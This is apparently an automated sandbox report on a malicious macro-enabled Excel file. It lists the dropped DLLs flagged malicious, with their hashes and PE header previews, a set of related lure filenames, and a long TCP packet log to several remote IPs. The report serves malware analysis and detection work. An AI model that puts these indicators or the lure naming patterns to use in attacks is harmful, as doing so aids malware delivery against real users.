	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: uhr908723097306.xlsm, Detection: malicious, Browse Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F30D540C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	174009
Entropy (8bit):	7.967231122944825
Encrypted:	false
SSDEEP:	3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5:	C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1:	AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256:	D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512:	131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................

C:\Users\user\Desktop\~$PI-9823472110866.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\XTOWN.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: uhr908723097306.xlsm, Detection: malicious, Browse Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse Filename: List-4527768.xlsm, Detection: malicious, Browse Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.939404138272304
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	PI-9823472110866.xlsm
File size:	189905
MD5:	8b631bad0869713bdfb6ba803d971283
SHA1:	74e21a99c75d20c0bd76db5d1a77c39b1721dfc7
SHA256:	8df7d1c0c37a519963e31bd2c7fd34b1cb5de232ee3bd9b1ab89878054d08715
SHA512:	5e15a75bcb8e7a334a9ade4a1dd894c293d002fe9c5419186255b616b89e448c6dd993c4cac5ee900ffc2bd5a496cf76efc4901056c9574599ce262abc67fa88
SSDEEP:	3072:EDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:ORcGUlFzy4mpTHdrUc3/SsYASx
File Content Preview:	PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 16:14:28.629766941 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:14:28.668478012 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 16:14:28.668740988 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:14:28.669274092 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:14:28.708539009 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 16:14:28.724915028 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 16:14:28.724936008 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 16:14:28.724998951 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:14:28.818289042 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.857954979 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.858098984 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.859438896 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.899626970 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.914916992 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.914997101 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915050030 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915090084 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915117025 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915119886 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915153027 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915205956 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915210009 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915313959 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915334940 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915384054 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915447950 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915529013 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915534019 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915590048 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915594101 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915640116 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915653944 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915709972 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915726900 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915750027 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.915766001 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.915832043 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.917098999 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.917160034 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.917181015 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.917201996 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.917218924 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.917263985 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.917273045 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.917339087 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919209957 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919358969 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919430971 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919436932 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919490099 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919502020 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919553041 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919559956 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919611931 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919751883 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919797897 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.919809103 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.919881105 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.920408964 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.921092033 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.921113968 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.921199083 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.921530962 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.921561003 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.922379017 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.922454119 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.922570944 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.922626019 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.924410105 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.924432039 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.924484968 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.924501896 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.924565077 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.924588919 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.924593925 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.954539061 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.954647064 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.954690933 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.954719067 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.955389023 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.955460072 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.955540895 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.955584049 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.955898046 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.955946922 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.955955982 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.955995083 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.956777096 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.956836939 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.956918001 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.957009077 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.957593918 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.957614899 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.957669020 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.957686901 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.958647966 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.958668947 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.958719969 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.958738089 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.959373951 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.959424973 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:28.959481001 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:14:28.959527016 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:14:29.044899940 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:14:29.083637953 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 16:14:29.083777905 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:14:29.084259033 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:14:29.123315096 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 16:14:29.159236908 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 16:14:29.159281015 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 16:14:29.159427881 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:14:30.206451893 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.248403072 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.248572111 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.259452105 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.299529076 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.300029039 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.300074100 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.300115108 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.300144911 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.303291082 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.303334951 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.303376913 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.320254087 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.359327078 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.360197067 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.586693048 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.613306999 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:30.613449097 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.918319941 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:30.957766056 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.077717066 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.077749968 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.077766895 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.077788115 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.077915907 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.162970066 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.163005114 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.163192987 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.163415909 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.163449049 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.163510084 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.164661884 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.164693117 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.164768934 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.165765047 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.165791988 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.165859938 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.166965961 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.167004108 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.167057991 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.168137074 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.168181896 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.168242931 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.169281960 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.169308901 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.169382095 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.170484066 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.170504093 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.170552015 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.171660900 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.171808958 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.171880007 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.172816992 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.172836065 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.172895908 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.173989058 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.174009085 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.174077034 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.175201893 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.175220966 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.175287962 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.252446890 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.252499104 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.252707958 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.253060102 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.253109932 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.253177881 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.254067898 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.254107952 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.254187107 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.255222082 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.255263090 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.255331993 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.256423950 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.256465912 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.256531954 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.257800102 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.257842064 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.257917881 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.258805990 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.258836031 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.258907080 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.340574980 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.340636015 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.340780973 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.341056108 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.341175079 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.341289043 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.342253923 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.342298031 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.342509985 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.343414068 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.343494892 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.343584061 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.344577074 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.344629049 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.344706059 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.345740080 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.345779896 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.345864058 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.346940994 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.346981049 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.347055912 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.348094940 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.348134041 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.348244905 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.349268913 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.349309921 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.349401951 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.350461006 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.350509882 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.350578070 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.351686001 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.351727962 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.351789951 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.352818012 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.352869987 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.352938890 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.354017019 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.354059935 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.354127884 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.355165958 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.431282043 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.431349039 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.431529999 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.431759119 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.431799889 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.431883097 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.432957888 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.432998896 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.433079004 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.434118986 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.434159040 CEST	443	49168	143.204.91.74	192.168.2.22
